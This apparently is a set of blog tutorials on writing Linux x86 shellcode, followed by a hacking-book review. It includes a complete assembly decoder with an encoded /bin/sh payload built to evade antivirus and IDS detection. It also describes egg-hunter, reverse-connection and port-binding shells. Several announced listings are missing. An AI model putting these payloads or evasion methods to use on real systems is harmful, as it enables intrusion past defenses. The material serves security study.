Adrian Citu's Blog

Linux

Goal

Shellcode authors very often try to obfuscate their shellcode in order to bypass IDS/IPS systems or antivirus software. This kind of shellcode is often called an “encoded shellcode”. The goal of this ticket is to propose a (rather simple) encoding schema and the matching decoder written in assembler.

What is an encoded shellcode

An encoded shellcode is a shellcode that has its payload encoded in order to escape signature-based detection. To work correctly, the shellcode must first decode the payload and then execute it. For a very basic example you can check the A Poor Man’s Shellcode Encoder / Decoder video.

(My) custom encoder

The encoding schema that I propose is the following one:

the payload is split into blocks of random size, between 1 and 9 bytes each.

the first octet of each encoded block holds the size of the original block.

the last byte of the encoded payload is a special terminator byte (0xff); the last block may therefore be shorter than its size byte announces.

Supposing that the payload is something like:

0xaa,0xbb,0xcc,0xdd,0xee

One possible encoding version could be:

0x02,0xaa,0xbb,0x01,0xcc,0x03,0xdd,0xee,0xff

or

0x04,0xaa,0xbb,0xcc,0xdd,0x02,0xee,0xff

or

0x09,0xaa,0xbb,0xcc,0xdd,0xee,0xff

If you want to play with this encoding schema you can use the Random-Insertion-Encoder.py program that will write to the console the encoded shellcode for a specific shellcode.
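The schema can also be sketched in a few lines of Python. This is a minimal illustration, not the Random-Insertion-Encoder.py script itself: the names encode, decode and TERMINATOR are made up for the example, and the sketch assumes that the payload never contains the 0xff byte, since that value is reserved for the terminator.

```python
import random
from typing import Optional

TERMINATOR = 0xFF  # assumed reserved: must not appear inside the payload


def encode(payload: bytes, rng: Optional[random.Random] = None) -> bytes:
    """Prefix random-sized blocks (1 to 9 bytes) with a size byte, then add 0xff."""
    if TERMINATOR in payload:
        raise ValueError("payload must not contain the terminator byte 0xff")
    rng = rng or random.Random()
    out = bytearray()
    i = 0
    while i < len(payload):
        size = rng.randint(1, 9)      # announced size of this block
        out.append(size)
        out += payload[i:i + size]    # the last block may be shorter than announced
        i += size
    out.append(TERMINATOR)
    return bytes(out)


def decode(encoded: bytes) -> bytes:
    """Drop the size bytes and stop at the terminator."""
    out = bytearray()
    i = 0
    while encoded[i] != TERMINATOR:
        size = encoded[i]
        i += 1
        copied = 0
        while copied < size and encoded[i] != TERMINATOR:
            out.append(encoded[i])
            i += 1
            copied += 1
    return bytes(out)


if __name__ == "__main__":
    sample = bytes([0xAA, 0xBB, 0xCC, 0xDD, 0xEE])
    print(", ".join("0x%02x" % b for b in encode(sample)))
```

Because the block sizes are random, two runs usually give different encodings of the same payload, but decode always gives back the original bytes.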

(My) custom decoder

So, initially the payload is encoded (with the custom schema) and, when the shellcode is executed, the decoder must run first in order to rebuild a valid payload. The decoder decodes the payload and then passes the execution to it.

The first problem that the decoder must solve is finding the memory address of the encoded payload. To do this, we will use the “Jump Call Pop” mechanism explained in the Introduction to Linux shellcode writing (Part 2) (paragraph 5.1).

A few words before showing you the code of the decoder. The decoder basically moves bytes from the right toward the left and skips the first byte of each block until the terminator byte is found. The lodsb and stosb instructions are used to move the bytes. These instructions use the ESI (lodsb) and EDI (stosb) registers, so you can see ESI as a source register and EDI as a destination register.

The DL register is used as a counter of the bytes already copied from the current block, and the CL register holds the first byte of the block (its size). So, in order to know whether all the bytes of a block have been copied, DL is compared with CL.

Special care should be taken before the ESI register is incremented, either manually or automatically by the lodsb instruction. The decoder must check whether ESI points to the terminator byte and stop the copy if it does; otherwise it will try to read memory locations that it is not allowed to access (and the program will stop with a segmentation fault).

So, here is the code of the decoder:

global _start
section .text
_start:
jmp short call_shellcode
decoder:
;get the address of the shellcode
pop esi
;align edi and esi
lea edi, [esi]
handle_next_block:
;check that esi does not point
;to the terminator byte
xor ecx,ecx
mov cl, byte[esi]
mov bl , cl
xor bl, 0xff
;if esi points to terminator byte
;then execute the shellcode
jz short EncodedShellcode
;otherwise skip the next byte
;because it's the first byte
;of the block and it contains
;the number of bytes that
;the block contains.
inc esi
;dl is used to count the
;number of bytes from a block
;already copied
xor edx, edx
handle_next_byte:
;check that esi does not point
;to the terminator byte
mov bl, [esi]
xor bl, 0xff
;if esi points to the terminator byte
;then execute the shellcode
jz short EncodedShellcode
;otherwise copy the byte pointed by
;esi to the location pointed by edi;
;esi is automatically incremented by
;the lodsb and edi by stosb
lodsb
stosb
;one more byte of the block has been copied
;so increment the counter
inc dl
;check that all the bytes of the block
;have been copied;
;cl contains the first byte of the block
;representing the number of bytes of the
;block and dl contains the number of
;block bytes already copied
cmp cl, dl
;if not zero then not all the block bytes
;have been copied
jnz handle_next_byte
;otherwise go to the next block
jmp handle_next_block
call_shellcode:
call decoder
EncodedShellcode: db 0x06,0x31,0xc0,0x50,0x68,0x2f,0x2f,0x09,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,0x89,0xe3,0x01,0x50,0x07,0x89,0xe2,0x53,0x89,0xe1,0xb0,0x0b,0x01,0xcd,0x09,0x80,0xff
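To check the logic without running the assembler, the same loop can be mirrored in Python. This is only a sketch: the variables esi, edi, cl and dl stand in for the registers of the same name, and decode_in_place is a hypothetical helper, not part of the original code. The ENCODED bytes are the ones from the db line above.

```python
ENCODED = bytes([
    0x06, 0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x09, 0x73, 0x68, 0x68,
    0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x01, 0x50, 0x07, 0x89, 0xe2,
    0x53, 0x89, 0xe1, 0xb0, 0x0b, 0x01, 0xcd, 0x09, 0x80, 0xff,
])


def decode_in_place(buf: bytearray) -> bytes:
    """Compact the payload to the start of buf, as the decoder does in memory."""
    esi = 0                          # source index (read position)
    edi = 0                          # destination index (write position)
    while buf[esi] != 0xFF:          # handle_next_block: stop on the terminator
        cl = buf[esi]                # size byte of the current block
        esi += 1                     # skip the size byte
        dl = 0                       # bytes of this block already copied
        while True:                  # handle_next_byte
            if buf[esi] == 0xFF:     # terminator reached inside a block
                return bytes(buf[:edi])
            buf[edi] = buf[esi]      # lodsb followed by stosb
            esi += 1
            edi += 1
            dl = (dl + 1) & 0xFF     # dl is an 8-bit register
            if dl == cl:             # whole block copied, go to the next one
                break
    return bytes(buf[:edi])


if __name__ == "__main__":
    print(decode_in_place(bytearray(ENCODED)).hex())
```

The result is the 25-byte payload, with the six size bytes and the terminator removed.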

Goal

The goal of this ticket is to write an egg hunter shellcode. An egg hunter is a piece of code that, when executed, looks for another (usually bigger) piece of code called the egg and passes the execution to it. This technique is usually used when the space available for the executing shellcode is limited (smaller than the egg) and it is possible to inject the egg in another memory location. Because the egg is injected at a non-static memory location, it must start with an egg tag in order to be recognized by the egg hunter.

1. How to test the shellcode

It may look odd, but I will start by presenting the program that will be used to test the egg hunter. The test program is a modified version of the shelcode.c used in the previous tickets.

We start by defining the egg tag, the egg hunter and the egg; the egg is prefixed twice with the egg tag in order to be recognized by the egg hunter. The main program just passes the execution to the egg hunter, which searches for the egg (somewhere in the memory space of the program) and then passes the execution to it.

Usually the egg tag is eight bytes long: a four-byte value repeated twice. The reason the tag repeats itself is that it allows the egg hunter to be optimized for size, since it can search for a single four-byte value that appears twice, one right after the other. This eight-byte version of the egg tag tends to be unique enough that it can be chosen easily without running a high risk of collision.

2. Implementation

2.1 Define the egg tag

Defining the egg tag is quite easy; in the end it is up to you to choose a rather unique word. In our case the egg tag is egg1. In order to be used by the egg hunter, the tag must be converted to its HEX value. I crafted a small script, fromStringToAscii.sh, that converts each input character to its ASCII code and then to HEX. So in our case the egg tag value will be 0x31676765.
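The same conversion can be checked with a short Python sketch. It is not the fromStringToAscii.sh script; tag_to_dword is a hypothetical helper name, and the sketch assumes a four-character ASCII tag stored as a little-endian 32-bit value, which is why the characters appear reversed in the HEX value.

```python
def tag_to_dword(tag: str) -> int:
    """Return the 32-bit little-endian value of a four-character ASCII tag."""
    raw = tag.encode("ascii")
    if len(raw) != 4:
        raise ValueError("the tag must be exactly four ASCII characters")
    # 'e' 'g' 'g' '1' is 65 67 67 31 in memory; read as a little-endian dword
    return int.from_bytes(raw, "little")


if __name__ == "__main__":
    print(hex(tag_to_dword("egg1")))  # 0x31676765
```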

2.2 Implement the egg hunter

The egg hunter implementation should first find the addressable space allocated to the host process (the process in which the egg hunter is embedded), then search inside this addressable space for the egg and finally pass the execution to the egg.
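These three steps can be modelled with a toy Python sketch. It is not the assembler implementation: memory is represented by a hypothetical dictionary that maps page numbers to the content of the accessible pages (a page missing from the dictionary stands for an address the process cannot read), PAGE_SIZE and find_egg are names invented for the example, and the sketch assumes that the doubled tag does not straddle two pages.

```python
from typing import Dict, Optional

PAGE_SIZE = 4096      # assumed page size for the model
EGG_TAG = b"egg1"     # the four-byte tag, expected twice in a row


def find_egg(pages: Dict[int, bytes], tag: bytes = EGG_TAG) -> Optional[int]:
    """Return the address of the first byte after the doubled tag, or None."""
    marker = tag + tag
    for page_number in sorted(pages):           # only accessible pages are visited
        offset = pages[page_number].find(marker)
        if offset != -1:
            # execution would continue right after the eight tag bytes
            return page_number * PAGE_SIZE + offset + len(marker)
    return None


if __name__ == "__main__":
    memory = {
        3: b"egg1" + b"\x00" * 16,              # a single tag is not a match
        5: b"\x90" * 10 + b"egg1egg1" + b"\xcc" * 8,
    }
    print(hex(find_egg(memory)))
```

Searching for the tag twice in a row is what keeps a lone copy of the four-byte value, such as the one in page 3 of the example, from being mistaken for the egg.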

On Linux this behavior can be achieved using the access(2) system call. The egg hunter calls the access system call systematically in order to find the memory pages that the host process can access and, once an accessible page is found, it looks for the egg in it. Here is the implementation code:

3. Putting all together

Now we have all the missing pieces, so we can try to put them together. As the egg I used the reverse connection shellcode from How to write a reverse connection shellcode. The final result is something like:

Goal

The goal of this ticket is to write a shellcode that makes a connection from the hacked system to a different system, where it can be caught by network tools like netcat.

In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2), meaning that I will first write a C version and then translate the C version into assembler, trying to avoid the common shellcode writing pitfalls like the null bytes problem and the addressing problem.

For all the other calls (dup2, execve and close) the system call numbers are:

#define __NR_dup2 63
#define __NR_execve 11
#define __NR_close 6

The second step is to look at the man page of each function to check which parameters it needs.

2.2 Implement the assembler version for each of the functions from the C program

Once we have all the necessary information for the functions used in the C version (the system call numbers and the parameters), the next step is to write the assembler version of the C program.

The assembler version of the shellcode is strongly inspired by the shellcode from How to write a port-biding shellcode; I just removed the functions that were not needed for the actual shell and added one missing function (the ConnectSocket function).

3.1 Make the external IP address and port number as a parameter

In the actual code the external IP address and the port number are static (they are the same for every execution). We would like to make these 2 values configurable. First we must find the HEX value of the instructions that push the IP address and the port number, using objdump with the following parameters:

One last point about these two parameters (IP address and port number): they are pushed on the stack as HEX values and, because Intel processors are Little Endian, their bytes must be written in reverse order. For example, if you want to use port 12345 (0x3039), you should push 0x3930.
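The byte swap can be checked with a small Python sketch. The helper names port_immediate and ip_immediate are invented for the example, and 192.168.1.10 is only a sample address. The sketch assumes that the socket address structure expects both values in network (big-endian) byte order, while the immediate written in the push instruction is stored by the processor in little-endian order.

```python
import socket


def port_immediate(port: int) -> int:
    """Value to write in the push so that memory holds the port in network order."""
    return int.from_bytes(port.to_bytes(2, "big"), "little")


def ip_immediate(ip: str) -> int:
    """Value to write in the push so that memory holds the IPv4 address in network order."""
    return int.from_bytes(socket.inet_aton(ip), "little")


if __name__ == "__main__":
    print(hex(port_immediate(12345)))          # 0x3930
    print(hex(ip_immediate("192.168.1.10")))   # 0xa01a8c0
```

Note that an address such as 127.0.0.1 gives a value that contains zero bytes, which brings back the null bytes problem.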

Goal

The goal of this ticket is to write a shellcode that opens a socket on a specific port and executes a shell when someone connects to that port.

In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2), meaning that I will first write a C version and then translate the C version into assembler, trying to avoid the common shellcode writing pitfalls like the null bytes problem and the addressing problem.

1. The C version of the shellcode

The following listing represents a minimal version (no error checking is done) of a port-binding program. Basically the program performs the following actions:

create a socket

bind the socket to an address and port

listen for clients

accept a client connection

redirect stdin, stdout and stderr to the new socket opened for the client connection

For all the other calls (dup2, execve and close) the system call numbers are:

#define __NR_dup2 63
#define __NR_execve 11
#define __NR_close 6

The second step is to look at the man page of each function to check which parameters it needs.

2.2 Implement the assembler version for each of the functions from the C program

Once we have all the necessary information for the functions used in the C version (the system call numbers and the parameters), the next step is to write the assembler version of the C program.

For the assembler implementation I decided to encapsulate each of the system calls in different functions for (code) clarity reasons even if the shellcode would be bigger. Initially my plan was to have something like this in the _start section of the program:

Unfortunately, even though the original implementation worked flawlessly, the embedded shellcode didn’t work and I was not able to find the root cause. So, the working implementation still contains a separate assembler function for each C function, but each function calls the following one:

3.1 Make the port number as a parameter

In the actual code the port number is static (it’s the same for every execution, 0xffff). We would like to make it a parameter. First we must find the HEX value of the instruction that pushes the port number, using objdump with the following parameters:

objdump -d SocketServer -M intel | grep ffff

and we will find:

8048080: 66 6a ff pushw 0xffff

So, in our binary representation of the shellcode we could define a constant representing the port number, something like:

One last point about the port number: it is pushed on the stack as a HEX value and, because Intel processors are Little Endian, its bytes must be written in reverse order. For example, if you want to use port 12345 (0x3039), you should push 0x3930. You can use this small sh script to compute the port number in “good” order: https://github.com/AdrianCitu/slae/blob/master/slae1/portCalc.sh

All the source code presented in this ticket can be found on GitHub.

3. Recap

In the previous ticket we created a dummy shellcode, first in C and then in assembler; we tested the dummy shellcode but saw that the execution failed. In this ticket we will try to fix the dummy shellcode’s problems and hopefully execute it successfully.

The 2 most common pitfalls that shellcode writers must address in their code are the null bytes problem and the addressing problem.

4. The null bytes problem

Very often the shellcode is injected into the vulnerable program through C string functions such as strcpy, so the shellcode content is treated as an array of char values terminated by a special NULL character (value ‘\0’). When the shellcode contains a NULL byte, that byte is interpreted as the string terminator and the copy stops there, so the rest of the shellcode is lost.

In order to fix the problem, you must not use any NULL byte in the shellcode, but first you have to find them. The easiest way to spot them is to use the objdump tool.
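Once the bytes of the shellcode are available, the check can also be automated. The following Python sketch is only an illustration: null_offsets is a hypothetical helper, and the two byte strings are the standard 32-bit encodings of mov eax, 4 and of xor eax, eax followed by mov al, 4, used here as an example rather than taken from the dummy shellcode.

```python
from typing import List


def null_offsets(code: bytes) -> List[int]:
    """Return the offsets of all the NULL bytes found in the shellcode."""
    return [i for i, b in enumerate(code) if b == 0]


# mov eax, 4: the 32-bit immediate is padded with three NULL bytes
WITH_NULLS = bytes.fromhex("b804000000")
# xor eax, eax then mov al, 4: same value in eax, no NULL byte
WITHOUT_NULLS = bytes.fromhex("31c0b004")

if __name__ == "__main__":
    print(null_offsets(WITH_NULLS))      # [2, 3, 4]
    print(null_offsets(WITHOUT_NULLS))   # []
```

The second encoding shows the usual way around the problem: clear the whole register first, then load only its low byte.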

5. The addressing problem

The addressing problem is linked to the data used by the shellcode; in our case it is the string “Hello World !”. As you can see in the assembler code, the ecx register will contain the memory address of the message to write on the screen:

mov ecx, message

and this instruction will be turned by the assembler into the following one:

mov ecx,0x80490a0

where 0x80490a0 is a memory location computed statically at build time. When the shellcode is executed inside another program, that memory location will almost certainly contain something else. This is the reason why, when we executed our shellcode (see the last screenshot from the previous ticket), the output was some strange characters and not the expected string.

To summarize, the shellcode must dynamically compute the memory addresses of all its data, and there are 2 ways to do this: the jump call pop technique and/or pushing the data on the stack.

5.1 Compute memory location using “Jump Call Pop”

When the Intel call instruction is executed, the address of the next instruction (the return address) is pushed on the stack, so it sits at the top of the stack (pointed to by ESP). So, the trick is to place the data whose address you need right after a call instruction and then pop that address from the stack. Here is some pseudocode:

jmp short callFunction
functionThatWillUseData:
;the top of the stack (ESP) holds the address of the data
pop eax
;now eax contains the address of the data
;... use the data here ...
callFunction:
call functionThatWillUseData
data: db "blabla", 0xA

Now, we will rewrite our dummy shellcode to compute the address of the “Hello World” string. Here is the new version of the dummy shellcode:

At this point we have fixed all the problems, so the shellcode should execute successfully. If you want to know how to test it, go to the “Test your shellcode” paragraph of my previous ticket.

5.2 Compute memory location by pushing the data on the stack

The second technique (which will make your code smaller than the previous one) is to push the data that you want to use in your shellcode directly on the stack. If your data is longer than 4 bytes, you can split it in multiple chunks and push them one by one; in our case we will split the data in 4 chunks.
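The values to push can be computed with a short Python sketch. It is only an illustration: push_immediates is a hypothetical helper, and the example string /bin//sh was chosen only because its length is a multiple of four. The sketch pushes the last chunk first, because the stack grows toward lower addresses, and reads each chunk as a little-endian 32-bit value.

```python
from typing import List


def push_immediates(data: bytes) -> List[int]:
    """Return the 32-bit values to push, in push order, so that data ends up at ESP."""
    if len(data) % 4 != 0:
        raise ValueError("pad the data to a multiple of 4 bytes first")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # last chunk first: the first chunk must end up at the lowest address
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


if __name__ == "__main__":
    for value in push_immediates(b"/bin//sh"):
        print("push 0x%08x" % value)
    # push 0x68732f2f
    # push 0x6e69622f
```

A string that needs a terminating zero would also require a zero to be pushed before these values, for example from a register that was cleared with xor.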

Another point worth mentioning is that the chunks are pushed on the stack in reverse order, because the stack grows from “up” to “down” (from higher memory addresses to lower memory addresses) and, to make things more complex, the order of the letters in each chunk is reversed because of the Intel Little Endian architecture. So, finally the data on the stack will look like this:

Introduction

This is a very brief and basic list of steps to follow if you want to write a shellcode under the Linux operating system.

1. Craft the shellcode

The first step and by far the most important one is to find a vulnerability and to write the shellcode that’s exploiting the vulnerability. In this tutorial we will write a dummy shellcode represented by the “Hello World” program. The easiest way to write a shellcode is first to write it in the C language and then in order to have a more compact version, to translate it or to rewrite the shellcode in assembler.

1.1 Craft the shellcode in C

The main goal of writing the shellcode in C is to have a first working version of the exploit without (yet) bothering about the constraints of shellcode execution (see later the chapter about the validity of the shellcode). In our case, the C version of our dummy shellcode is the following one:

After the compilation (gcc -o hello hello.c) we can take a look at the generated assembly code (objdump -d ./hello -M intel) and we would see that for a very small C program the assembly version is quite long (this is mainly due to the C runtime start-up code that is linked into the program); it’s 228 lines long (objdump -d ./hello -M intel | wc -l).

Now we would like to “translate” the C version of our shellcode into assembly, and the most straightforward way is to find the system calls that are made by the C version. In some cases the system calls are quite obvious (the case of the write function) but sometimes they are not so easy to guess. The tool that lists the system calls for you is strace. In our case strace ./hello will have the following output (the parts that are interesting for us are in bold):

1.2 Craft the shellcode in assembler

Now that we have the system calls, we can gather some information such as the parameters needed by each system call (using man) and the system call numbers (all the system call names and numbers are in the /usr/include/i386-linux-gnu/asm/unistd_32.h file).

So, the number of the write call is 4 (using cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep write) and the parameters are the following (using man 2 write):

ssize_t write(int fd, const void *buf, size_t count);

For the exit system call the number is 1 and the call parameters are:

void _exit(int status);

Having all the needed information, we can write the assembler version of our dummy shellcode.

In order to make a system call in assembler, you must fill the eax register with the system call number and fill the ebx, ecx and edx registers (in that order) with the parameters that the system call needs.

For example, write has 3 parameters, so the eax register will be filled with 0x4 (the system call number), the ebx register will contain the file descriptor (1 for stdout), the ecx register will contain the address of the string to print, and the edx register will contain the length of the string to print (if you don’t have any knowledge of Linux assembler you can take a look at this very good introduction: Assembly Language and Shellcoding on Linux):

The above lines are simulating a vulnerable program by overwriting the return address of the main() function with the address of the shellcode, in order to execute the shellcode instructions upon exit from main().

The HEX version of the shellcode can be obtained from the binary file using the objdump utility and a much smarter version of the command can be found on commandlinefu.com
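As an alternative to a shell one-liner, the extraction can be sketched in Python. This is not the command from commandlinefu.com; objdump_to_bytes and to_c_string are hypothetical helpers, and the sketch assumes the usual objdump -d layout in which the address, the instruction bytes and the mnemonic of each line are separated by tab characters.

```python
def objdump_to_bytes(listing: str) -> bytes:
    """Collect the instruction bytes from the output of objdump -d."""
    out = bytearray()
    for line in listing.splitlines():
        fields = line.split("\t")
        # instruction lines look like: "<address>:<TAB><hex bytes><TAB><mnemonic>"
        if len(fields) < 2 or not fields[0].strip().endswith(":"):
            continue
        hex_bytes = "".join(fields[1].split())
        try:
            out += bytes.fromhex(hex_bytes)
        except ValueError:
            continue                  # not a byte column, ignore the line
    return bytes(out)


def to_c_string(code: bytes) -> str:
    """Format the bytes as a C string literal body, e.g. \\x66\\x6a\\xff."""
    return "".join("\\x%02x" % b for b in code)


if __name__ == "__main__":
    sample = " 8048080:\t66 6a ff             \tpushw  0xffff\n"
    print(to_c_string(objdump_to_bytes(sample)))
```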

Let’s compute the HEX version of our dummy shellcode and then test it with our test program.

The HEX version of our assembler version of the dummy shellcode is the following one:

Chapter 0x100 Introduction

A very short chapter (2 and a half pages) in which the author gives his definition of a hacker: a person who finds unusual solutions to any kind of problem, not only technical ones. The author also expresses very clearly the goal of his book: “The intent of this book is to teach you the true spirit of hacking. We will look at various hacking techniques, from the past to the present, dissecting them to learn how and why they work”.

Chapter 0x200 Programming

The chapter is an introduction to the C programming language and to assembler for Intel x86 processors. The entry level is very low: it starts by explaining the use of pseudo-code and then very gradually introduces many of the structures of the C language: variables, variable scopes, control structures, structs, functions, pointers (don’t expect a complete introduction to C or advanced material).

The chapter contains a lot of code examples, very clearly explained using the GDB debugger. Since all the examples run under Linux, the last part of the chapter contains some basics about programming on the Linux operating system, like file permissions, uid, gid and setuid.

Chapter 0x300 Exploitation

This chapter builds on the knowledge learned in the previous one and is dedicated to buffer overflow exploits. Most of the chapter treats the stack-based buffer overflow in great detail, using examples of gradually increasing complexity. Overflow vulnerabilities on other memory segments are also presented: overflows on the heap and on the BSS.

The last part of the chapter is about format string exploits. Some of the format string exploits use specific GNU C compiler structures (.dtors and .ctors). In almost all the examples, the author uses GDB to explain the details of the vulnerabilities and of the exploits.

One negative remark is that in some of the exploits the author uses shellcodes without explaining how they have been crafted (on the other hand, an entire chapter is devoted to shellcodes).

Chapter 0x400 Networking

This chapter is dedicated to the network hacking(s) and can be split in 3 parts. The first part is rather theoretical, the ISO OSI model is presented and some of the layers (data-link layer, network layer and transport layer) are explained in more depth.

The second part of the chapter is more practical; different network protocols are presented like ARP, ICMP, IP, TCP; the author explains the structure of the packets/datagrams for the protocols and the communication workflow between the hosts. On the programming side, the author makes a very good introduction to sockets in the C language.

The third part of the chapter is devoted to the hacks and is built on top of the first two parts. For the packet sniffing hacks the author introduces the libpcap library and for the packet injection hacks the author uses the libnet library (ARP cache poisoning, SYN flooding, TCP RST hijacking). Other networking hacks are presented, like different port scanning techniques, denial of service and the exploitation of a buffer overflow over the network. In most of the hacks the author crafts his own tools, but sometimes he uses tools like nemesis and nmap.

Chapter 0x500 Shellcode

This chapter is an introduction to shellcode writing. In order to be injected in the target program the shellcode must be as compact as possible, so the most suitable programming language for this task is assembler.

The chapter starts with an introduction to the assembler language for the Linux platform and continues with an example of a “hello world” shellcode. The goal of the “hello world” shellcode is to present different techniques to make the shellcode position-independent in memory.

The rest of the chapter is dedicated to the shell-spawning (local) and port-binding (remote) shellcodes. In both cases the same presentation pattern is followed: the author starts with an example of the shellcode in C and then translates and adapts it (using GDB) into assembler.

Chapter 0x600 Countermeasures

The chapter is about the countermeasures that an intruder should apply in order to cover his tracks and become as undetectable as possible, but also the countermeasures that a victim should apply in order to reduce or nullify the effect of an attack.

The chapter is organized around the exploits of a very simple web server. The exploits proposed are increasingly complex and stealthy: from the “classical” port-binding shellcode that can be easily detected to more advanced camouflage techniques like forking the shellcode in order to keep the target program running, spoofing the logged IP address of the attacker or reusing an already open socket for the shellcode communication.

In the last part of the chapter some defensive countermeasures are presented, like the non-executable stack and randomized stack space. For each of these hardening countermeasures some partial workarounds are explained.

Chapter 0x700 Cryptology

The last chapter treats cryptology, a subject very hard to explain to a neophyte. The first part of the chapter contains information about algorithmic complexity and about symmetric and asymmetric encryption algorithms; the author brilliantly demystifies the operation of the RSA algorithm.

The last part of the chapter is quite outdated today (the book was published in 2008) and is dedicated to wireless 802.11b encryption and to the weaknesses of WEP.

Chapter 0x800 Conclusion

Like the introduction chapter, this chapter is very short and, as in the first chapter, the author repeats that hacking is a state of mind and that hackers are people with an innovative spirit.

(My) Conclusion

The book is a very good introduction to different technical topics of IT security. Even if the author tried to make the text easy for non-technical people (the chapter about programming starts with an explanation of pseudo-code), some programming experience is required (ideally C/C++) in order to get the best out of this book.